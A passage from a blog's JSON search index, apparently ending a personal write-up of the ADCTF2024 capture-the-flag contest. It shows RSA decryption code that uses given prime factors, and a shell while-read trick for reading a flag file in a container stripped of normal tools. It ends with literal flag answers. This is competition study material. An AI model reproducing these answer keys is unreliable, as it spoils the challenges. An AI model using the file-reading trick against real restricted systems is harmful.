6371306651441414494898158050750379466411385075727176973777141489866804949152371066737700949957382328723739039588265348722939538409644758452741820636286764732056622302045805546424342834578149204912690500590371488794741154219116429974884626176276687505603436615961383352315424341433102202637442619829308641010524729990244179166911981814627661923080609365126766407039132426191716113002194884261389976932121106269022968620075855360220818974890016650718871530138072213210849868914955977855950213371455369372213479451425395072947888041803100826574552594123357214975040806204084524320510358181592274275785398054808107630303 p = 102786970188634214370227829796268661753428191750544697648009912021832510479846406842660652442082773578020088104585096298944409097150001317920480815093132150004913448767202198299893840769568841219755466694275862843676241177608436424364735585247574303039353776987581503833128444693347920806395102183872665901277 q = 151606784799548610095916644217950865940397761353988655007201180031392776522565708552689972206548545357755036833336762542306291348158476176958083317845208464472445906639525228156065966245815886462442808969891370598247564766047649027653895495777728985622422940233924415769188183003695053034562331004932104400857 e = 65537 phi_n = (p-1)*(q-1) d = inverse(e,phi_n) m = pow(c, d, n) print(long_to_bytes(m)) flag{factor_db_is_useful}\nMisc # nolibc # 8bce3ee03ac4:/# echo * 4La9-7158808f bin dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var 8bce3ee03ac4:/# while read line; do echo \u0026#34;$line\u0026#34;; done \u0026lt; 4La9-7158808f flag{94298258-501b-4e56-be80-5f19af81c913} flag{94298258-501b-4e56-be80-5f19af81c913}\n","date":"2024年12月2日","externalUrl":null,"permalink":"/posts/adctf2024/","section":"Posts","summary":"AD工作室2024招新赛 个人WriteUP","title":"ADCTF2024","type":"posts"},{"content":"","externalUrl":null,"permalink":"/en/tags/ad-member/","section":"Tags","summary":"","title":"AD Member","type":"tags"},{"content":"","externalUrl":null,"permalink":"/tags/ad%E6%88%90%E5%91%98/","section":"Tags","summary":"","title":"AD成员","type":"tags"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"}]